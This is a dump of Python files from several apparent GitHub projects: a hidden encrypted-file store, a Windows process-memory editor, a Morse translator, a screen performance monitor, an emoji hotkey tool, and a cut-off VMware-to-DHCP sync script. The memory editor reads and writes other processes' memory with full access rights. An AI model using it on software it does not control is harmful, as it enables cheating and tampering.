self.__data = self.__decrypt(self.__key, data)
# Hide the file.
system.set_dir_attr("+H", self.__filename, all = False)
def __update_database(self):
# Encrypt the data.
data = self.__encrypt(self.__key, self.__data)
# Show the file.
system.set_dir_attr("-H", self.__filename, all = False)
# Save the data to the file.
with open(self.__filename, "wb") as file:
file.write(self.__key + data)
# Hide the file.
system.set_dir_attr("+H", self.__filename, all = False)
def get_data(self):
# Return a copy of the data.
return self.__data.copy()
def get_key(self):
# Return the sum of the key characters.
return sum([ord(char) for char in self.__key.decode()])
def update(self, data):
# Update the data in the database.
self.__data = data.copy()
self.__update_database()
```
#### File: util/crypt/cryptV2.py
```python
from cryptography.fernet import Fernet
def decryptV2(key: bytes, data: bytes) -> bytes:
return Fernet(key).decrypt(data)
def encryptV2(key: bytes, data: bytes) -> bytes:
return Fernet(key).encrypt(data)
def generate_keyV2() -> bytes:
return Fernet.generate_key()
```
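These helpers are direct pass-throughs to `cryptography.fernet.Fernet`, so a round trip looks like this (the import path is assumed from the layout used in database.py above):

```python
from src.util.crypt import generate_keyV2, encryptV2, decryptV2

key = generate_keyV2()
token = encryptV2(key, b"secret data")
assert decryptV2(key, token) == b"secret data"
```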
|
{
"source": "JeanExtreme002/MemoryManager",
"score": 3
}
|
#### File: MemoryManager/PyMemoryEditor/__init__.py
```python
__author__ = "<NAME>"
__version__ = "1.0.1"
from .process import Process
from .win32.constants import PROCESS_ALL_ACCESS, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE
from .win32.functions import CloseHandle, GetProcessHandle, ReadProcessMemory, WriteProcessMemory
__all__ = ("OpenProcess", "PROCESS_ALL_ACCESS", "PROCESS_VM_OPERATION", "PROCESS_VM_READ", "PROCESS_VM_WRITE")
class OpenProcess(object):
def __enter__(self): return self
def __exit__(self, exc_type, exc_value, exc_traceback): self.close()
def __init__(self, window_title = None, process_name = None, pid = None, permission = PROCESS_ALL_ACCESS):
        # Store the permission argument.
self.__permission = permission
# Create a Process instance.
self.__process = Process()
# Set the attributes to the process.
if pid:
self.__process.pid = pid
elif window_title:
self.__process.window_title = window_title
elif process_name:
self.__process.process_name = process_name
else:
raise TypeError("You must pass an argument to one of these parameters (window_title, process_name, pid).")
# Get the process handle.
self.__process_handle = GetProcessHandle(permission, False, self.__process.pid)
def close(self):
"""
Close the process handle.
"""
return CloseHandle(self.__process_handle)
def read_process_memory(self, address, pytype, bufflength):
"""
Return a value from a memory address.
@param address: Target memory address (ex: 0x006A9EC0).
        @param pytype: Type of the value to be received (str, int or float).
@param bufflength: Value size in bytes (1, 2, 4, 8).
"""
        if self.__permission not in [PROCESS_ALL_ACCESS, PROCESS_VM_READ]:
raise PermissionError("The handle does not have permission to read the process memory.")
        return ReadProcessMemory(self.__process_handle, address, pytype, bufflength)
def write_process_memory(self, address, pytype, bufflength, value):
"""
Write a value to a memory address.
@param address: Target memory address (ex: 0x006A9EC0).
@param pytype: Type of value to be written into memory (str, int or float).
@param bufflength: Value size in bytes (1, 2, 4, 8).
@param value: Value to be written (str, int or float).
"""
        if self.__permission not in [PROCESS_ALL_ACCESS, PROCESS_VM_OPERATION | PROCESS_VM_WRITE]:
raise PermissionError("The handle does not have permission to write to the process memory.")
return WriteProcessMemory(self.__process_handle, address, pytype, bufflength, value)
```
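A usage sketch based on the API above; the window title and address are placeholder values, and reads or writes raise `PermissionError` when the handle lacks the matching access right.

```python
# Hypothetical target; the title and the address are example values only.
from PyMemoryEditor import OpenProcess

with OpenProcess(window_title="Untitled - Notepad") as process:
    value = process.read_process_memory(0x006A9EC0, int, 4)
    process.write_process_memory(0x006A9EC0, int, 4, value + 1)
```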
#### File: PyMemoryEditor/process/errors.py
```python
class ProcessIDNotExistsError(Exception):
def __init__(self, pid):
self.__pid = pid
def __str__(self):
return "The process ID \"%i\" does not exist." % self.__pid
class ProcessNotFoundError(Exception):
def __init__(self, process_name):
self.__process_name = process_name
def __str__(self):
return "Could not find the process \"%s\"." % self.__process_name
class WindowNotFoundError(Exception):
def __init__(self, window_title):
self.__window_title = window_title
def __str__(self):
return "Could not find the window \"%s\"." % self.__window_title
```
#### File: PyMemoryEditor/process/__init__.py
```python
from .errors import ProcessIDNotExistsError, ProcessNotFoundError, WindowNotFoundError
from .util import get_process_id_by_process_name, get_process_id_by_window_title, pid_exists
class Process(object):
__pid = 0
__process_name = ""
__window_title = ""
@property
def pid(self):
return self.__pid
@pid.setter
def pid(self, pid):
# Check if the value is an integer.
if not isinstance(pid, int):
raise ValueError("The process ID must be an integer.")
# Check if the PID exists and instantiate it.
if pid_exists(pid): self.__pid = pid
else: raise ProcessIDNotExistsError(pid)
@property
def process_name(self):
return self.__process_name
@process_name.setter
def process_name(self, process_name):
# Get the process ID.
pid = get_process_id_by_process_name(process_name)
if not pid: raise ProcessNotFoundError(process_name)
# Set the PID and process name.
self.__pid = pid
self.__process_name = process_name
@property
def window_title(self):
return self.__window_title
@window_title.setter
def window_title(self, window_title):
# Get the process ID.
pid = get_process_id_by_window_title(window_title)
if not pid: raise WindowNotFoundError(window_title)
# Set the PID and the window title.
self.__pid = pid
self.__window_title = window_title
```
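Setting any of the three properties resolves and validates the PID through the setters above; the process name below is a placeholder.

```python
from PyMemoryEditor.process import Process

process = Process()
process.process_name = "notepad.exe"  # raises ProcessNotFoundError if absent
print(process.pid)                    # PID resolved by the setter
```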
#### File: PyMemoryEditor/win32/functions.py
```python
from .util import get_c_type_of
from ctypes import byref, windll, c_void_p
kernel32 = windll.LoadLibrary("kernel32.dll")
def CloseHandle(handle) -> int:
"""
Close the process handle.
"""
return kernel32.CloseHandle(handle)
def GetProcessHandle(access_right, inherit, pid) -> int:
"""
Get a process ID and return its process handle.
"""
return kernel32.OpenProcess(access_right, inherit, pid)
def ReadProcessMemory(process_handle, address, pytype, bufflength):
"""
Return a value from a memory address.
"""
    if pytype not in [str, int, float]: raise ValueError("The type must be string, int or float.")
data = get_c_type_of(pytype, int(bufflength))
kernel32.ReadProcessMemory(process_handle, c_void_p(address), byref(data), bufflength, None)
return data.value
def WriteProcessMemory(process_handle, address, pytype, bufflength, value):
"""
Write a value to a memory address.
"""
    if pytype not in [str, int, float]: raise ValueError("The type must be string, int or float.")
data = get_c_type_of(pytype, int(bufflength))
data.value = value.encode() if isinstance(value, str) else value
kernel32.WriteProcessMemory(process_handle, c_void_p(address), byref(data), bufflength, None)
return value
```
|
{
"source": "JeanExtreme002/Morse-Code-Translator",
"score": 3
}
|
#### File: JeanExtreme002/Morse-Code-Translator/app.py
```python
from translator import MorseCodeTranslator
from tkinter import Tk,Label,Text,Frame,Button,Scrollbar,IntVar
import sys
if "win" in sys.platform:
from winsound import Beep
class App(object):
"""
Classe principal
"""
__button_width = 15
__button_height = 1
__button_bg = "green2"
__button_fg = "white"
__button_font = ("Autumn",27)
__button_relief = "flat"
__inputText_height = 5
__label_fg = "#F5F5F5"
__label_font = ("Impact",20)
__outputText_height = 7
__text_width = 50
__text_bg = "white"
__text_fg = "black"
__text_font = ("Arial",14)
frequency = 1500
window_title = "Morse Code Translator"
window_geometry = [600,500]
window_bg = "gray50"
def __init__(self):
        # Create a Tk instance and configure the window.
self.__root = Tk()
self.__root.geometry("{}x{}".format(*self.window_geometry))
self.__root["bg"] = self.window_bg
self.__root.title(self.window_title)
self.__root.resizable(False,False)
self.__root.focus_force()
self.__root.bind("<Return>",self.translate)
self.__playing = False
self.__waitVar = IntVar()
        # Call the method that builds the program's interface.
self.build()
def build(self):
"""
Método para construir interface do programa.
"""
# Cria um título para a entrada do texto que será traduzido.
Label(
self.__root,
bg = self.window_bg,
font = self.__label_font,
fg = self.__label_fg,
text = "Input:",
pady = 10
).pack()
        # Create a frame to hold the input field.
input_frame = Frame(self.__root,bg=self.window_bg)
input_frame.pack()
        # Create a field for the user to type the text.
self.__inputText = Text(
input_frame,
width = self.__text_width,
height = self.__inputText_height,
bg = self.__text_bg,
fg= self.__text_fg,
font = self.__text_font,
wrap = "word"
)
self.__inputText.insert(0.0," Type here...")
        # Create a scrollbar for the input field.
scrollbar = Scrollbar(input_frame)
scrollbar.pack(side="right",fill="y")
self.__inputText.config(yscrollcommand=scrollbar.set)
scrollbar.config(command=self.__inputText.yview)
self.__inputText.pack()
        # Create a title for the field where the translated text will be placed.
Label(
self.__root,
bg = self.window_bg,
font = self.__label_font,
fg = self.__label_fg,
text = "Output:",
pady = 10
).pack()
        # Create a frame to hold the output field.
output_frame = Frame(self.__root,bg=self.window_bg)
output_frame.pack()
        # Field to hold the translated text.
self.__outputText = Text(
output_frame,
width = self.__text_width,
height = self.__outputText_height,
bg = self.__text_bg,
fg= self.__text_fg,
font = self.__text_font,
wrap = "word"
)
self.__outputText.insert(0.0," The text translation will appear here.")
        # Create a scrollbar for the output field.
scrollbar = Scrollbar(output_frame)
scrollbar.pack(side="right",fill="y")
self.__outputText.config(yscrollcommand=scrollbar.set)
scrollbar.config(command=self.__outputText.yview)
self.__outputText.pack()
        # Create a frame to hold the buttons.
buttons_frame = Frame(self.__root,bg=self.window_bg,pady=20)
buttons_frame.pack()
# Cria uma "borda" para o botão.
button1_frame = Frame(buttons_frame,bg="black",padx=2,pady=2)
button1_frame.pack(side="left")
        # Create a button to translate the text.
self.__button1 = Button(
button1_frame,
width = self.__button_width,
height = self.__button_height,
relief = self.__button_relief,
bg = self.__button_bg,
fg = self.__button_fg,
font = self.__button_font,
text = "Translate",
command = self.translate
)
self.__button1.pack()
        # If the user's OS is Windows, a button is created
        # to play the morse code sound.
if "win" in sys.platform:
Label(buttons_frame,bg=self.window_bg,padx=5).pack(side="left")
# Cria uma "borda" para o botão.
button2_frame = Frame(buttons_frame,bg="black",padx=2,pady=2)
button2_frame.pack(side="left")
            # Create a button to play the morse code sound.
self.__button2 = Button(
button2_frame,
width = self.__button_width,
height = self.__button_height,
relief = self.__button_relief,
bg = self.__button_bg,
fg = self.__button_fg,
font = self.__button_font,
text = "Play",
command = self.play
)
self.__button2.pack()
self.__root.mainloop()
def play(self):
"""
Método para reproduzir o som do código morse.
"""
# Para a reprodução.
if self.__playing:
self.__playing = False
return
        # Get the output text and check whether it is morse code.
text = self.__outputText.get(0.0,"end")
if not text or text.isspace() or not MorseCodeTranslator.isMorse(text): return
        # Indicate that the morse code sound is being played.
self.__playing = True
self.__button2.config(text = "Stop")
        # Split the text into words.
for char in text.split(" "):
            # Get each letter of the word.
for l in char:
if not self.__playing:
break
                # Check whether the character is the error char.
if l == MorseCodeTranslator.errorChar:
continue
                # Play a beep for 0.3 seconds if it is a dot.
if l == ".":
Beep(self.frequency,300)
                # Play a beep for 0.6 seconds if it is a dash.
elif l == "-":
Beep(self.frequency,600)
                # Sleep for 2.1 seconds if it is the start of a new word.
elif l == "/":
self.wait(2100)
if not self.__playing:
break
            # Wait 0.9 seconds.
self.wait(900)
        # Indicate that playback has finished.
self.__playing = False
self.__button2.config(text = "Play")
def translate(self,event=None):
"""
Método do botão para traduzir o texto.
"""
# Obtém o input do usuário.
text = self.__inputText.get(0.0,"end")
if not text: return
        # Clear the output field and insert the translated user input.
self.__outputText.delete(0.0,"end")
self.__outputText.insert(0.0,MorseCodeTranslator.translate(text))
def wait(self,ms):
"""
Método para aguardar um tempo em Ms.
"""
self.__waitVar.set(0)
self.__root.after(ms,self.__waitVar.set,1)
self.__root.wait_variable(self.__waitVar)
self.__waitVar.set(0)
if __name__ == "__main__":
App()
```
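The `translator` module itself is not included above, so the interface below is inferred purely from the attributes the GUI uses (`translate`, `isMorse`, `errorChar`) and should be treated as an assumption.

```python
# Assumed interface, inferred from the calls made by App above.
from translator import MorseCodeTranslator

code = MorseCodeTranslator.translate("SOS")
print(code)                               # presumably dots, dashes and "/"
print(MorseCodeTranslator.isMorse(code))  # presumably True
```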
|
{
"source": "JeanExtreme002/Performance-Monitor",
"score": 3
}
|
#### File: Performance-Monitor/src/monitoringWindow.py
```python
from tkinter import Canvas,Label,Tk
import psutil
import src.util
import time
class MonitoringWindow(object):
X = 30
Y = 30
VERTICAL = 1
HORIZONTAL = 2
cursor = "cross white"
__movable = False
__direction = HORIZONTAL
def __init__(self,chromaKeyColor="black"):
        # Create the window and apply some settings.
self.__root = Tk()
self.__root.resizable(False,False)
self.__root.overrideredirect(True)
self.__root["bg"] = chromaKeyColor
self.__destroy = False
        # Set the window size to the size of the user's monitor.
self.__width = self.__root.winfo_screenwidth()
self.__height = self.__root.winfo_screenheight()
self.__root.geometry("{}x{}+0+0".format(self.__width,self.__height))
        # Apply the chroma key and configure the window to always stay on top,
        # so the information is always visible.
self.__chromaKeyColor = chromaKeyColor
self.__root.wm_attributes("-transparentcolor",self.__chromaKeyColor)
self.__root.wm_attributes("-topmost", True)
def adjustLocation(self):
"""
Método para ajustar a posição dos textos na tela.
"""
i = 0
lastcoord = [0,0,0,0]
for item in self.__items:
if not item: continue
coord = self.__canvas.bbox(item)
            # If the direction is VERTICAL, the texts are stacked one below the other.
if self.__direction == self.VERTICAL:
self.__canvas.move(item,coord[0]*-1+self.X,coord[1]*-1+self.Y+self.__spacing*i)
            # If the direction is HORIZONTAL, each text is placed beside the previous ones.
else:
                # If the item is the first text, the X position of the text block is added to its X position.
if i == 0:
self.__canvas.move(item,coord[0]*-1+self.X,coord[1]*-1+self.Y)
                # Otherwise, the item's X position is the previous item's X2 plus the font size.
else:
self.__canvas.move(item,(coord[0]-lastcoord[2])*-1+self.__font[1],coord[1]*-1+self.Y)
lastcoord = coord
i+=1
def build(self,color="red",font=("Arial",40),ping=True,cpu=True,ram=True,memory=True,battery=True,outline="black",direction=VERTICAL,movable=True):
"""
Método para construir a parte gráfica
relacionada às informações de performance.
"""
self.__ping = ping
self.__cpu = cpu
self.__ram = ram
self.__memory = memory
self.__battery = battery
self.__color = color
self.__font = font
self.__outline = outline
        # Get the text direction.
if direction in [self.VERTICAL,self.HORIZONTAL]: self.__direction = direction
        # Create a canvas that will hold the texts.
        # The canvas uses the chroma key color, so it
        # disappears and only the texts remain visible.
self.__canvas = Canvas(
self.__root,
bg=self.__chromaKeyColor,
width=self.__width,
height=self.__height,
highlightthickness=0,
)
# Caso a opção "movable" seja True, o usuário poderá mover o texto caso ele clique no mesmo.
if movable:
self.__canvas.bind("<Button-1>",self.__move)
self.__canvas.config(cursor=self.cursor)
        # This list stores the ID of every text.
self.__items = []
        # Create a text to show the PING.
if ping:
self.__items.append(self.__canvas.create_text(0,0,text="PING:",fill=color,font=font,tag="PING"))
        # Create a text for each CPU the user has.
if cpu:
self.__items.append(self.__canvas.create_text(0,0,text="CPU:",fill=color,font=font,tag="CPU"))
for i in range(psutil.cpu_count()):
self.__items.append(self.__canvas.create_text(0,0,text="CPU {}:".format(i+1),fill=color,font=font,tag="CPU"))
        # Create a text for the RAM usage.
if ram:
self.__items.append(self.__canvas.create_text(0,0,text="RAM:",fill=color,font=font,tag="RAM"))
        # Create a text to show the current memory usage and the total memory.
if memory:
self.__items.append(self.__canvas.create_text(0,0,text="MEMORY:",fill=color,font=font,tag="MEMORY"))
        # Create a text to show the battery status.
if battery:
self.__items.append(self.__canvas.create_text(0,0,text="BATTERY:",fill=color,font=font,tag="BATTERY"))
        # Get the text height to compute the spacing between the texts.
if len(self.__items) > 0:
coord = self.__canvas.bbox(self.__items[0])
self.__spacing = coord[3] - coord[1]
        # Update the window.
self.__update()
self.__canvas.pack()
def close(self):
"""
Encerra totalmente a janela de monitoramento.
"""
self.stop()
self.__destroy = True
def drawOutline(self):
"""
Método para criar uma borda no texto.
"""
size = 2
color = self.__outline
self.__canvas.delete('outline')
        # Iterate over each text in the list.
for item in self.__items:
if not item: continue
            # Get the text coordinates in (X,Y) format.
coord = self.__canvas.bbox(item)
coord = (coord[0]+((coord[2]-coord[0])//2) , coord[1]+((coord[3]-coord[1])//2))
            # Get the text.
text = self.__canvas.itemcget(item,"text")
            # Draw the same text with the same font on the canvas,
            # but at slightly shifted positions to create an outline effect.
self.__canvas.create_text(coord[0]-size,coord[1],text=text,font=self.__font,fill=color,tag='outline')
self.__canvas.create_text(coord[0]+size,coord[1],text=text,font=self.__font,fill=color,tag='outline')
self.__canvas.create_text(coord[0],coord[1]-size,text=text,font=self.__font,fill=color,tag='outline')
self.__canvas.create_text(coord[0],coord[1]+size,text=text,font=self.__font,fill=color,tag='outline')
            # Bring the main text to the front.
self.__canvas.tag_raise(item)
def __drawRect(self):
"""
Método para criar um retângulo caso o usuário tenha clicado no texto.
"""
self.__canvas.delete("rect")
        # Check whether the user clicked on the text.
if not self.__movable: return
size = 4
x1 = self.__width
y1 = self.__height
x2 = 0
y2 = 0
        # Get the (x1,y1,x2,y2) coordinates to draw the rectangle.
for item in self.__items:
coord = self.__canvas.bbox(item)
if coord[0] < x1:
x1 = coord[0]-10
if coord[1] < y1:
y1 = coord[1]-10
if coord[2] > x2:
x2 = coord[2]+10
if coord[3] > y2:
y2 = coord[3]+10
        # Draw the rectangle.
self.__canvas.create_line((x1,y1),(x2,y1),(x2,y2),(x1,y2),(x1,y1),fill=self.__color,width=size,tag="rect")
x1 -= size//2
y1 -= size//2
x2 += size//2
y2 += size//2
        # Draw an outer border.
self.__canvas.create_line((x1,y1),(x2,y1),(x2,y2),(x1,y2),(x1,y1),fill=self.__outline,tag="rect")
x1 += size
y1 += size
x2 -= size
y2 -= size
        # Draw an inner border.
self.__canvas.create_line((x1,y1),(x2,y1),(x2,y2),(x1,y2),(x1,y1),fill=self.__outline,tag="rect")
def __move(self,event=None):
"""
Método para mover o texto para a posição X,Y do mouse.
"""
# Deleta retângulo do mouse.
self.__canvas.delete("mouse")
        # If the method was called by an event (a click), the text is not moved.
if event:
if not self.__canvas.focus_get() and not self.__movable: return
self.__movable = not self.__movable
return
if not self.__movable: return
        # Get the mouse's X,Y position.
x = self.__root.winfo_pointerx()
y = self.__root.winfo_pointery()
        # Check whether the mouse is still: return False if so, True otherwise.
if self.X == x and self.Y == y: return False
        # Create a rectangle so the user can click on a canvas item, giving it focus.
        # This way, the user can leave the text-moving mode.
size = 5
self.__canvas.create_rectangle(x-size-3,y-size-3,x+size-3,y+size-3,fill=self.__color,outline=self.__outline,tag="mouse")
self.X = x+3
self.Y = y+3
return True
def run(self,updateIn=1000,number_size_after_floating_point=2):
"""
Método para inicializar o monitoramento.
"""
self.__stop = False
i = 1
ping = "0"
total_cpu_usage = 0
memory_percent = 0
memory_used = 0
memory_total = 0
battery_percent = 0
battery_power_plugged = False
        # Keep updating the information until the user
        # asks to stop the monitoring.
while not self.__stop:
            # If X or more seconds have passed, the text information is updated.
if not self.__movable:
                # Get the ping.
if self.__ping:
c_ping = src.util.getLatency()
if not c_ping: c_ping = "Undefined"
                # Get the CPU usage.
if self.__cpu:
cpu = psutil.cpu_percent(0,True)
c_total_cpu_usage = sum(cpu)*(100/(len(cpu)*100))
cpu_i = -1
# Obtém o consumo de memória RAM.
if self.__ram or self.__memory:
memory = psutil.virtual_memory()
                # Get the battery information.
if self.__battery:
battery = psutil.sensors_battery()
                # Update the information of each item.
for item in self.__items:
if not item: continue
                    # Get the item tag and update its information.
tag = self.__canvas.itemcget(item,"tag")
                    # Before updating a given text, the new data is compared with the
                    # data currently in the text. This check avoids unnecessary
                    # processing: a text is only redrawn when it actually changes.
                    # Update the PING.
if tag.lower() == "ping":
if ping == c_ping: continue
text = "PING: "+c_ping
ping = c_ping
                    # Update the CPU usage information.
elif tag.lower() == "cpu":
if total_cpu_usage == c_total_cpu_usage:
continue
if cpu_i == -1:
text = "CPU: %.{}f%%".format(number_size_after_floating_point)%c_total_cpu_usage
else:
text = "CPU %i: %.{}f%%".format(number_size_after_floating_point)%(cpu_i+1,cpu[cpu_i])
cpu_i += 1
if cpu_i == len(cpu):
total_cpu_usage = c_total_cpu_usage
                    # Update the RAM usage information.
elif tag.lower() == "ram":
if memory_percent == memory.percent:
continue
text = "RAM: %.{}f%%".format(number_size_after_floating_point)%memory.percent
memory_percent = memory.percent
                    # Update the memory usage information.
elif tag.lower() == "memory":
if memory_used == memory.used and memory_total == memory.total:
continue
text = "MEMORY: %i %s / %i %s"%(*src.util.getFormattedSize(memory.used),*src.util.getFormattedSize(memory.total))
memory_used = memory.used
memory_total = memory.total
                    # Update the battery information.
elif tag.lower() == "battery":
if battery_percent == battery.percent and battery_power_plugged == battery.power_plugged:
continue
text = "BATTERY: %i %% "%battery.percent
if battery.power_plugged:
text += "( ON )"
else:
text += "( OFF )"
battery_percent = battery.percent
battery_power_plugged = battery.power_plugged
else:
continue
                    # Update the text.
self.__canvas.delete("outline")
self.__canvas.itemconfig(item,text=text)
                    # Since horizontally laid-out texts can easily become misaligned
                    # due to size changes, the window is updated after each text update.
if self.__direction == self.HORIZONTAL: self.__update()
                # Update the window.
self.__update()
time.sleep(updateIn/1000)
else:
                # Update if the mouse is at a position different from the text, or if "movable" is False.
if self.__move() or not self.__movable:
self.__update()
time.sleep(0.01)
            # Destroy the GUI if the close() method has been called.
if self.__destroy:
self.__root.destroy()
def stop(self):
"""
Método para parar o monitoramento.
Este metódo apenas interrompe a atualização de
informação do método run(), mas ele não destrói a GUI.
"""
self.__stop = True
def __update(self):
"""
Método para atualizar os textos.
"""
# Ajusta a posição dos textos na tela e espera um tempo para
# não consumir muito processamento do usuário.
self.adjustLocation()
        # Draw an outline around the text.
self.drawOutline()
        # Draw a rectangle if the user has clicked on the texts.
self.__drawRect()
        # Update the screen.
self.__root.update()
```
#### File: Performance-Monitor/src/util.py
```python
import subprocess
import re
latency_pattern = re.compile(r"\D+=\d+ms") # This pattern is used by the getLatency() function
def getFormattedSize(bytes_):
"""
Função para obter um tamanho em bytes formatado.
"""
types = ["Bytes","KB","MB"]
index = 0
while bytes_ > 1024 and index < len(types)-1:
bytes_ /= 1024
index += 1
return bytes_,types[index]
def getLatency(server="www.google.com",timeout=0):
"""
Função para obter o tempo de resposta de um servidor.
"""
if timeout:
output = subprocess.getoutput("ping /n 1 /w %i %s"%(timeout,server))
else:
output = subprocess.getoutput("ping /n 1 %s"%(server))
try:
output = latency_pattern.findall(output)[0]
latency = output.split("=")[1].split("ms")[0]
return latency
except:
return None
```
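`getFormattedSize` divides by 1024 until the value fits its unit table, and `getLatency` parses the output of the Windows `ping` command (`/n` and `/w` are Windows-only switches). For example:

```python
from src.util import getFormattedSize, getLatency

size, unit = getFormattedSize(8 * 1024 * 1024)
print("%.1f %s" % (size, unit))     # 8.0 MB

latency = getLatency(timeout=1000)  # None if the host is unreachable
print(latency)                      # e.g. '23' (milliseconds, as a string)
```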
|
{
"source": "JeanExtreme002/Text-Emoji-Generator",
"score": 3
}
|
#### File: Text-Emoji-Generator/src/__init__.py
```python
from src.generator import Generator
from src.listener import KeyListener
class App(object):
"""
Classe principal
"""
def __init__(self, master_key, clipboard, keys_and_emojis = {}):
"""
@param master_key: Veja a documentação na classe Listener.
@param clipboard: Veja a documentação na classe Generator.
@param keys_and_emojis: Dicionário com teclas e emojis.
"""
self.__master_key = master_key
self.__clipboard = clipboard
self.__keys_and_emojis = keys_and_emojis
self.__emoji_generator = Generator()
self.__listener = None
def __make_emoji(self, key_pressed):
"""
Cria emoji de uma determinada tecla.
"""
key = key_pressed.lower()
if key in self.__keys_and_emojis:
emoji = self.__keys_and_emojis[key]
self.__emoji_generator.generate(emoji, self.__clipboard)
def get_keys_and_emojis(self):
"""
Obtém dicionário com teclas e emojis.
"""
return self.__keys_and_emojis.copy()
def is_running(self):
"""
Verifica se a Thread ainda está em execução.
"""
return self.__listener.is_alive()
def run(self):
"""
Inicializa o Listener.
"""
self.__listener = KeyListener(self.__master_key)
self.__listener.start(self.__make_emoji)
def stop(self):
"""
Finaliza a execução da Thread.
"""
self.__listener.stop()
def update_keys_and_emojis(self, keys_and_emojis):
"""
Atualiza as teclas e emojis.
@param keys_and_emojis: Dicionário com teclas e emojis.
"""
self.__keys_and_emojis.update(keys_and_emojis)
```
|
{
"source": "jeanfabrice/vmware2dfhcp",
"score": 2
}
|
#### File: vmware2dfhcp/vmware2dhcp/vmware2dhcp.py
```python
import atexit
import logging
import os
import pypureomapi
import re
import ssl
import struct
import sys
import time
from pyVim.connect import SmartConnect, Disconnect
from pyVmomi import vim # See https://github.com/vmware/pyvmomi pylint: disable=no-name-in-module
from datetime import datetime, timedelta
from pytz import timezone
from prometheus_client import start_http_server, Counter, Gauge, Summary, Info
# time (in seconds) between Vmware event checks
SLEEP_TIME = 5
# See https://pubs.vmware.com/vsphere-6-5/topic/com.vmware.wssdk.apiref.doc/vim.event.VmEvent.html
VMWARE_MONITORED_ADD_EVENTS = [vim.event.VmCreatedEvent]
VMWARE_MONITORED_UPDATE_EVENTS = [vim.event.VmReconfiguredEvent, vim.event.VmMacChangedEvent, vim.event.VmRenamedEvent, vim.event.VmStartingEvent, vim.event.VmPoweredOnEvent]
VMWARE_MONITORED_REMOVE_EVENTS = [vim.event.VmRemovedEvent]
VMWARE_MONITORED_EVENTS = VMWARE_MONITORED_ADD_EVENTS + VMWARE_MONITORED_UPDATE_EVENTS + VMWARE_MONITORED_REMOVE_EVENTS
VMWARE_EVENTS_PAGE_SIZE = 1000
# See https://pubs.vmware.com/vsphere-6-5/topic/com.vmware.vspsdk.apiref.doc/vim.vm.GuestOsDescriptor.GuestOsIdentifier.html
UNMANAGED_GUESTID_REGEXP = r'^win.+'
# Sample validating and catching regexp for virtual machine FQDN based name
FQDN_VALIDATION_REGEXP = re.compile('^([a-zA-Z0-9][a-zA-Z0-9-]*)[.]([a-zA-Z0-9-.]+)')
FILTER_EVENT_COUNT = Counter('vmware2dhcp_filtering_event_total', 'VM filtering events', ['vc', 'dhcp', 'event'])
FILTER_EVENT_LATENCY = Summary('vmware2dhcp_filtering_events_latency_seconds', 'VM filtering latency', ['vc', 'dhcp', 'filter'])
DHCPD_LATENCY = Summary('vmware2dhcp_dhcpd_latency_seconds', 'dhcpd server latency', ['vc', 'dhcp', 'stage'])
VSPHERE_LATENCY = Summary('vmware2dhcp_vsphere_latency_seconds', 'VSphere server latency', ['vc', 'dhcp', 'stage'])
VMWARE_EVENT_COUNT = Counter('vmware2dhcp_vmware_event_total', 'VM events received', ['vc', 'dhcp', 'event'])
FAILURE_COUNT = Counter('vmware2dhcp_exception', 'Vmware2dhcp exceptions raised', ['vc', 'dhcp', 'exception'])
logger = logging.getLogger(__name__)
with open(os.path.join(os.path.dirname(os.path.realpath(__file__)), 'VERSION'), 'r') as fh:
__version__ = fh.readline().strip()
class MyOmapi(pypureomapi.Omapi):
def __init__(self, hostname, port, username=None, key=None, timeout=None):
super(MyOmapi, self).__init__(hostname, port, username.encode('utf8'), key.encode('utf8'), timeout)
def add_host_with_options(self, mac, options={}, group=None):
optionList=[]
msg = pypureomapi.OmapiMessage.open(b'host')
msg.message.append((b'create', struct.pack('!I', 1)))
msg.message.append((b'exclusive', struct.pack('!I', 1)))
msg.obj.append((b'hardware-type', struct.pack('!I', 1)))
msg.obj.append((b'hardware-address', pypureomapi.pack_mac(mac)))
for key, value in options.items():
optionList.append('option {0} "{1}";'.format(key,value))
if optionList:
msg.obj.append((b'statements', ''.join(optionList).lower().encode('utf8')))
# unsupported since group takes precedence over options
# if group:
# msg.obj.append((b'group', group.encode('utf8')))
logger.debug('Omapi message: {0}'.format(msg.obj))
response = self.query_server(msg)
if response.opcode != pypureomapi.OMAPI_OP_UPDATE:
raise pypureomapi.OmapiError('Add failed')
class Vmware2dhcp():
def __init__(self, cfg):
self.cfg=cfg
def createTimeFilter(self,vStartTime, vEndTime):
localTimeFilter = vim.event.EventFilterSpec.ByTime()
localTimeFilter.beginTime = vStartTime
localTimeFilter.endTime = vEndTime
return localTimeFilter
def filterEvent(self,event):
with FILTER_EVENT_LATENCY.labels(vc=self.cfg['vc_address'], dhcp=self.cfg['dhcp_address'], filter='check_vm').time():
# Filter out event if we don't have any associated VM
if event.vm is None:
FILTER_EVENT_COUNT.labels(vc=self.cfg['vc_address'], dhcp=self.cfg['dhcp_address'], event='no_vm').inc()
return False
with FILTER_EVENT_LATENCY.labels(vc=self.cfg['vc_address'], dhcp=self.cfg['dhcp_address'], filter='check_vmconfig').time():
# Filter out event if we don't have access to the VM hardware configuration
if event.vm.vm.config is None:
FILTER_EVENT_COUNT.labels(vc=self.cfg['vc_address'], dhcp=self.cfg['dhcp_address'], event='no_vmconfig').inc()
return False
with FILTER_EVENT_LATENCY.labels(vc=self.cfg['vc_address'], dhcp=self.cfg['dhcp_address'], filter='check_network').time():
# Filter out event if the VM doesn't live on a provisioning subnet
if self.cfg['vm_networks']:
inMonitoredVmNetwork = False
for network in event.vm.vm.network:
if network.name in self.cfg['vm_networks']:
inMonitoredVmNetwork = True
break
if not inMonitoredVmNetwork:
FILTER_EVENT_COUNT.labels(vc=self.cfg['vc_address'], dhcp=self.cfg['dhcp_address'], event='bad_network').inc()
return False
with FILTER_EVENT_LATENCY.labels(vc=self.cfg['vc_address'], dhcp=self.cfg['dhcp_address'], filter='check_device').time():
# Filter out event if the VM doesn't have any attached device
if event.vm.vm.config.hardware.device is None:
FILTER_EVENT_COUNT.labels(vc=self.cfg['vc_address'], dhcp=self.cfg['dhcp_address'], event='no_device').inc()
                return False
with FILTER_EVENT_LATENCY.labels(vc=self.cfg['vc_address'], dhcp=self.cfg['dhcp_address'], filter='check_network_interface').time():
# Filter out event if the VM doesn't have any network interface
hasEthernetCard = False
for dev in event.vm.vm.config.hardware.device:
if isinstance(dev, vim.vm.device.VirtualEthernetCard):
hasEthernetCard = True
break
if not hasEthernetCard:
FILTER_EVENT_COUNT.labels(vc=self.cfg['vc_address'], dhcp=self.cfg['dhcp_address'], event='no_network_interface').inc()
return False
with FILTER_EVENT_LATENCY.labels(vc=self.cfg['vc_address'], dhcp=self.cfg['dhcp_address'], filter='check_os').time():
